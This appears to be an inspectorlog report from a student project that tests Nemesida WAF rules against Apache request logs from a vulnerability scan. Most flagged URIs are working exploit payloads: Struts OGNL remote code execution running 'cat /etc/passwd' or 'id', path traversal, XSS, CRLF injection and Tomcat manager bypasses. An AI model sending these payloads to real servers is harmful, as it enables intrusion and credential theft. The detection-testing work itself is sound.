# inspectorlog v3.5
#----- Initializing Rules (NEMESIDA)  ---------------------
#	Opening NEMESIDA rule file /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt...
#		Rules: read [506], erroneous [0], URI (URL|ARGS) [449]
#-----  Statistics (NEMESIDA) ------------------------------
# Read [506] nemesida rules, [449] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l apache.uri -m /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt -t list -o /home/kali/TFG/inspectorlog/nemesida/web_estatica/owasp/opensource/nuclei/apache.clean
Packet [8]	Uri [/web/examples/jsp/snp/snoop.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [9]	Uri [/web/apache.conf]	Nattacks [1]	Signatures	[300001517]
Packet [17]	Uri [/web/server-status]	Nattacks [1]	Signatures	[300001899]
Packet [20]	Uri [/web/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E]	Nattacks [6]	Signatures	[300000052]	[300000508]	[300000515]	[300000537]	[300001826]	[300002846]
Packet [26]	Uri [/web/ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E]	Nattacks [6]	Signatures	[300000052]	[300000508]	[300000515]	[300000537]	[300001826]	[300002846]
Packet [27]	Uri [/web/25Sle3wTjPidLPUe4DuZBuG070g.php%5Cx0A]	Nattacks [1]	Signatures	[300001512]
Packet [35]	Uri [/web/examples/jsp/snp/snoop.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [36]	Uri [/web/apache.conf]	Nattacks [1]	Signatures	[300001517]
Packet [41]	Uri [/web/airflow.cfg]	Nattacks [1]	Signatures	[300001506]
Packet [45]	Uri [/web/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [48]	Uri [/web/server-status]	Nattacks [1]	Signatures	[300001899]
Packet [55]	Uri [/web/ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E]	Nattacks [6]	Signatures	[300000052]	[300000508]	[300000515]	[300000537]	[300001826]	[300002846]
Packet [70]	Uri [/web/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [75]	Uri [/web/~user/%0D%0ASet-Cookie:crlfinjection]	Nattacks [1]	Signatures	[300001359]
Packet [76]	Uri [/web/axis2/axis2-web/HappyAxis.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [83]	Uri [/web/airflow.cfg]	Nattacks [1]	Signatures	[300001506]
Packet [84]	Uri [/web/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [87]	Uri [/web/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd]	Nattacks [8]	Signatures	[300000053]	[300000066]	[300000069]	[300001072]	[300001559]	[300002700]	[300002708]	[300002718]
Packet [90]	Uri [/web/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001053]	[300001845]
Packet [104]	Uri [/web/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [112]	Uri [/web/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D]	Nattacks [9]	Signatures	[300000052]	[300000053]	[300000069]	[300001053]	[300001559]	[300001908]	[300002708]	[300002757]	[300002788]
Packet [121]	Uri [/web/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(xss)%3E]	Nattacks [3]	Signatures	[300000052]	[300000508]	[300000528]
Packet [122]	Uri [/web/axis2/axis2-web/HappyAxis.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [125]	Uri [/web/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))]	Nattacks [6]	Signatures	[300000052]	[300000069]	[300001559]	[300002700]	[300002708]	[300002757]
Packet [130]	Uri [/web/..;/manager/html]	Nattacks [2]	Signatures	[300000051]	[300002755]
Packet [132]	Uri [/web/axis/happyaxis.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [133]	Uri [/web/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd]	Nattacks [8]	Signatures	[300000053]	[300000066]	[300000069]	[300001072]	[300001559]	[300002700]	[300002708]	[300002718]
Packet [135]	Uri [/web/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001053]	[300001845]
Packet [144]	Uri [/web/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action]	Nattacks [6]	Signatures	[300000037]	[300000052]	[300000069]	[300001072]	[300001497]	[300001559]
Packet [146]	Uri [/web/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D]	Nattacks [5]	Signatures	[300000069]	[300001559]	[300002700]	[300002718]	[300002827]
Packet [148]	Uri [/web/host-manager/html]	Nattacks [1]	Signatures	[300001901]
Packet [154]	Uri [/web/index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [6]	Signatures	[300000037]	[300000052]	[300000069]	[300001072]	[300002708]	[300002717]
Packet [156]	Uri [/web/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300001516]
Packet [160]	Uri [/web/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(xss)%3E]	Nattacks [3]	Signatures	[300000052]	[300000508]	[300000528]
Packet [169]	Uri [/web/axis/happyaxis.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [173]	Uri [/web/..;/manager/html]	Nattacks [2]	Signatures	[300000051]	[300002755]
Packet [175]	Uri [/web/..;/host-manager/html]	Nattacks [3]	Signatures	[300000051]	[300001901]	[300002755]
Packet [177]	Uri [/web/axis2-web/HappyAxis.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [180]	Uri [/web/poc.jsp?cmd=cat+%2Fetc%2Fpasswd]	Nattacks [2]	Signatures	[300001516]	[300001559]
Packet [181]	Uri [/web/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action]	Nattacks [6]	Signatures	[300000037]	[300000052]	[300000069]	[300001072]	[300001497]	[300001559]
Packet [182]	Uri [/web/host-manager/html]	Nattacks [1]	Signatures	[300001901]
Packet [184]	Uri [/web/happyaxis.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [190]	Uri [/web/index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [6]	Signatures	[300000037]	[300000052]	[300000069]	[300001072]	[300002708]	[300002717]
Packet [193]	Uri [/web/..;/host-manager/html]	Nattacks [3]	Signatures	[300000051]	[300001901]	[300002755]
Packet [197]	Uri [/web/poc.jsp?cmd=cat+%2Fetc%2Fpasswd]	Nattacks [2]	Signatures	[300001516]	[300001559]
Packet [199]	Uri [/web/..;/examples/servlets/index.html]	Nattacks [2]	Signatures	[300000051]	[300002755]
Packet [200]	Uri [/web/index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [6]	Signatures	[300000037]	[300000052]	[300000069]	[300001072]	[300002708]	[300002717]
Packet [202]	Uri [/web/happyaxis.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [205]	Uri [/web/..;/examples/servlets/index.html]	Nattacks [2]	Signatures	[300000051]	[300002755]
Packet [206]	Uri [/web/..;/examples/jsp/index.html]	Nattacks [2]	Signatures	[300000051]	[300002755]
Packet [207]	Uri [/web/index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [6]	Signatures	[300000037]	[300000052]	[300000069]	[300001072]	[300002708]	[300002717]
Packet [211]	Uri [/web/..;/examples/jsp/index.html]	Nattacks [2]	Signatures	[300000051]	[300002755]
Packet [212]	Uri [/web/..;/examples/websocket/index.xhtml]	Nattacks [2]	Signatures	[300000051]	[300002755]
Packet [213]	Uri [/web/index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [6]	Signatures	[300000037]	[300000052]	[300000069]	[300001072]	[300002708]	[300002717]
Packet [216]	Uri [/web/index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [6]	Signatures	[300000037]	[300000052]	[300000069]	[300001072]	[300002708]	[300002717]
Packet [219]	Uri [/web/..;/examples/websocket/index.xhtml]	Nattacks [2]	Signatures	[300000051]	[300002755]
Packet [220]	Uri [/web/login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [6]	Signatures	[300000037]	[300000052]	[300000069]	[300001072]	[300002708]	[300002717]
Packet [225]	Uri [/web/login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [6]	Signatures	[300000037]	[300000052]	[300000069]	[300001072]	[300002708]	[300002717]
Packet [227]	Uri [/web/login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [6]	Signatures	[300000037]	[300000052]	[300000069]	[300001072]	[300002708]	[300002717]
Packet [230]	Uri [/web/login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [6]	Signatures	[300000037]	[300000052]	[300000069]	[300001072]	[300002708]	[300002717]
Packet [233]	Uri [/web/login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [6]	Signatures	[300000037]	[300000052]	[300000069]	[300001072]	[300002708]	[300002717]
Packet [236]	Uri [/web/login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [6]	Signatures	[300000037]	[300000052]	[300000069]	[300001072]	[300002708]	[300002717]
Packet [238]	Uri [/web/index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D]	Nattacks [6]	Signatures	[300000037]	[300000069]	[300001072]	[300002700]	[300002708]	[300002717]
Packet [240]	Uri [/web/index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D]	Nattacks [6]	Signatures	[300000037]	[300000069]	[300001072]	[300002700]	[300002708]	[300002717]
Packet [242]	Uri [/web/index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D]	Nattacks [6]	Signatures	[300000037]	[300000069]	[300001072]	[300002700]	[300002708]	[300002717]
Packet [243]	Uri [/web/index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D]	Nattacks [6]	Signatures	[300000037]	[300000069]	[300001072]	[300002700]	[300002708]	[300002717]
Packet [245]	Uri [/web/index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D]	Nattacks [6]	Signatures	[300000037]	[300000069]	[300001072]	[300002700]	[300002708]	[300002717]
Packet [247]	Uri [/web/index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D]	Nattacks [6]	Signatures	[300000037]	[300000069]	[300001072]	[300002700]	[300002708]	[300002717]
# N. packets [260], [68] with alerts, N. Alerts [245]
# Execution time: 0.183452 s
